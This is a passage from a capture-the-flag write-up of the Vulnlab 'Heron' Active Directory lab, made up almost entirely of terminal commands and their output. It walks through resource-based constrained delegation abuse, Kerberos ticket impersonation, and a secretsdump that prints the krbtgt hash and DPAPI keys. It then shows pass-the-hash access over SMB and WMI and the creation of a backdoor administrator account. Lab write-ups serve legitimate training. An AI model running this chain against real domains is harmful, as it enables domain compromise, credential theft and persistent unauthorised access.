┌──(puck㉿kali)-[~/vulnlab/heron] └─$ proxychains impacket-rbcd -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -dc-ip 10.10.165.85 -action 'write' 'heron.vl/adm_prju:ay<redacted>B4' [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.165.85:389 ... OK [*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty [*] Delegation rights modified successfully! [*] FRAJMP$ can now impersonate users on MUCDC$ via S4U2Proxy [*] Accounts allowed to act on behalf of other identity: [*] FRAJMP$ (S-1-5-21-1568358163-2901064146-3316491674-27101)
Get the ticket
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-getST -spn 'cifs/mucdc.heron.vl' -impersonate '_admin' 'heron.vl/FRAJMP$' -hashes :6f<redacted>f7
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain ... 127.0.0.1:1080 ... HERON.VL:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... HERON.VL:88 ... OK
[*] Impersonating _admin
[*] Requesting S4U2self
[proxychains] Strict chain ... 127.0.0.1:1080 ... heron.vl:88 ... OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain ... 127.0.0.1:1080 ... heron.vl:88 ... OK
[*] Saving ticket in _admin@cifs_mucdc.heron.vl@HERON.VL.ccache
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ export KRB5CCNAME=_admin@cifs_mucdc.heron.vl@HERON.VL.ccache
and do a secretsdump
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ proxychains impacket-secretsdump -k mucdc.heron.vl [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.165.85:445 ... OK [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0x7a8b61a266b3e6ba7b55725d51f2b723 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:36<redacted>4e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC HERON\MUCDC$:plain_password_hex:6ba8a<redacted>3adc3 HERON\MUCDC$:aad3b435b51404eeaad3b435b51404ee:a3623<redacted>94ee::: [*] DPAPI_SYSTEM dpapi_machinekey:0x76a0d28b7925171e2b82994b58e5991310b49216 dpapi_userkey:0xda9a3255d163e84c6ab4e578f44c544e80285f19 [*] NL$KM 0000 5C A7 E2 A0 9A 0F 0E A7 0A 6F 35 33 21 07 83 01 \........o53!... 0010 93 8A 8A 6D 21 3B C2 CA 60 E6 E6 B6 5A 22 04 A2 ...m!;..`...Z".. 0020 D1 F4 93 69 36 20 AF BB F7 38 31 3A BE E5 D5 29 ...i6 ...81:...) 0030 55 5E 2B 54 ED A4 1B 52 03 FD 77 75 AC F2 9A 58 U^+T...R..wu...X NL$KM:5ca7e2a09a0f0ea70a6f353321078301938a8a6d213bc2ca60e6e6b65a2204a2d1f493693620afbbf738313abee5d529555e2b54eda41b5203fd7775acf29a58 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.165.85:135 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.165.85:49667 ... OK _admin:500:aad3b435b51404eeaad3b435b51404ee:39<redacted>38::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c586ab9529b5a6445e501b2208403f2::: heron.vl\Katherine.Howard:24575:aad3b435b51404eeaad3b435b51404ee:654<redacted>d2:::
Get the flag’s
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.165.85\\C$ -U '_admin' --pw-nt-hash 39<redacted>38
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.165.85:445 ... OK
Try "help" to get a list of possible commands.
smb: \> dir
$Recycle.Bin DHS 0 Thu Jun 6 17:01:47 2024
--snip--
System Volume Information DHS 0 Sun May 26 11:48:42 2024
transfer D 0 Sun May 26 13:51:27 2024
Users DR 0 Sat Jun 1 17:43:04 2024
webaccounting D 0 Fri Jun 7 08:14:04 2024
Windows D 0 Sun Jun 2 17:26:03 2024
6261499 blocks of size 4096. 1962809 blocks available
Beyond root
proxychains xfreerdp /u:_admin /pth:39<redacted>38 /w:1566 /h:968 /v:10.10.134.197:3389
-> RDP in to MUCDC not allowed
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-wmiexec _admin@10.10.134.197 -hashes aad3b435b51404eeaad3b435b51404ee:39<redacted>38
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.134.197:445 ... OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.134.197:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.134.197:49669 ... OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
heron\_admin
C:\>net user /add puck Password123!
The command completed successfully.
C:\>net localgroup Administrators puck /add[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.134.197:135 ... OK
The command completed successfully.
$ proxychains xfreerdp /u:puck /p:Password123! /w:1566 /h:968 /v:10.10.134.197:3389
---
C:\Users\puck>net user adm_hoka
User name adm_hoka
Full Name adm_hoka
Comment t0
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/26/2024 4:50:28 AM
Password expires Never
Password changeable 5/27/2024 4:50:28 AM
Password required Yes
User may change password Yes
Workstations allowed admjmp_t0
Logon script \\heron.vl\SYSVOL\heron.vl\scripts\logon.vbs
User profile
Home directory \\mucdc.heron.vl\home$\adm_hoka
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *admins_t0
The command completed successfully.
---
logon.vbs contains
Option Explicit
Dim objShell, bgInfoPath, bgInfoConfigPath
Set objShell = CreateObject("WScript.Shell")
bgInfoPath = "\\heron.vl\SYSVOL\heron.vl\scripts\Bginfo64.exe"
bgInfoConfigPath = "\\heron.vl\SYSVOL\heron.vl\scripts\bginfo.bgi"
objShell.Run """" & bgInfoPath & """ """ & bgInfoConfigPath & """ /timer:0", 0, True
Set objShell = Nothing
This chain was really fun 🙂